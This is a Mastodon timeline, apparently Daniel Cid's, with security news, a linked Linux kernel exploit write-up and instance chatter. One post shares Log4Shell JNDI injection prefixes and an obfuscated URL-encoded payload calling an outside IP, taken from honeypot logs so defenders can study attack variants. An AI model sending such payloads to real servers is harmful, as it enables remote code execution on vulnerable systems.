Show newer
Daniel Cid boosted
Daniel Cid boosted
Daniel Cid boosted

CVE-2022-0435 is a remote stack overflow in the Transparent Inter-Process Communication (TIPC) module of the Linux kernel. We’re basically able to send a payload of attacker-controlled size to the target, where it will be memcpy’d into a 272-byte buffer on the kernel’s stack—not a bad primitive, right?....

Writing a Linux Kernel Remote in 2022

blog.immunityinc.com/p/writing

Really good detailed article.

Lots of new users joining Mastodon today. Welcome!!

Remember to read our rules and code of conduct here:

noc.social/terms

Daniel Cid boosted

Those of you cross-posting from #Twitter to #Mastodon - will you please consider doing the opposite? Make the #Fediverse your social media home and Twitter an afterthought.

Daniel Cid boosted

This reads like a recommendation for skiers. Snowboarding should be safe.

Daniel Cid boosted

Did you know there are centralized alternatives to the #Fediverse?

They are great!
Instead of being developed by volunteers for the community they are developed for millionaires with the sole purpose of getting them more money and influence over the "users".

They contain ads and algorithms, so you don't have to decide, what you want to see, but you get to see what makes you addicted, so you view more ads, buy more stuff and thereby support the capitalist system that we all love.

Instead of anonymity you get to enter your phone number and other form of identification, which totally helps against hate speech, right?

I could go on with advantages, but I think it's best you check them out for yourselves.

Mastodon upgraded to 3.5.0. Sorry for the small downtime here!

Daniel Cid boosted

A Closer Look at the LAPSUS$ Data Extortion Group.

Microsoft and identity management platform Okta both disclosed this week breaches involving LAPSUS$, a relatively new cybercrime group that specializes in stealing data from big companies and threatening to publish the information unless a ransom demand is paid. Here's a closer look at LAPSUS$, a...
krebsonsecurity.com/?p=59041

Sorry for the downtime. Someone created a malicious account here - got flagged by spamhaus - and our provider suspended the server.

Frustrating, but all clear now.

Daniel Cid boosted

"not arguing with strangers on the internet" continues to be the best policy

Daniel Cid boosted

Wow. CSS Tricks has been acquired by Digital Ocean. Congrats to Chris, he’s a great guy and deserves all the success in the world.

css-tricks.com/css-tricks-is-j

T-Mobile Actively Censoring Certain URLs:

youtube.com/watch?v=U-HE6_F3tM

And not just those URLs via SMS. They are also blocking CleanBrowsing DoH url - without ever replying or giving us a valid reason.

${jndi:ldap://

${jndi:rmi://

${jndi:dns://

Another other protocol being actively used that I am missing? At least, only seeing those 3 on our honeypot logs:

reputation.noc.org/jndi-attack

Also some interesting obfuscation, I am assuming to bypass WAF and IDSs:

/?id=%24%7B%24%7B%3A%3A-j%7Dndi%3Adns%3A%2F%2F45.83.64.1%2F

We are sharing jndi (log4j) attack logs here:

reputation.noc.org/jndi-attack

Might be useful to find variation of attacks and IPs abusing it.

Daniel Cid boosted

@dcid @val @cleanbrowsing

Something really cool about this session is you can actually interact by sending in your questions ...

You can send them to:

livestudio@cloudflare.tv or calling (380) 333 - 5273

Had no idea that was a thing.. haha! Oh boy..

Show thread
Daniel Cid boosted

If you need some noise to help you fall asleep better..

Will be doing a session with @dcid and @val today at 11 PDT to talk about our work @cleanbrowsing and a bit of our backgrounds...

Daniel Cid boosted

1975: "Let's build the Internet, a network that can survive a nuclear war!"
2021: "Let's host everything on the server of this one discount bookshop!"

Show older
Noc.Social

Open Source Social Network. Focused on technology, networking, linux, privacy and security, but open to anyone. Civil discourse, polite and open. Managed by the noc.org team.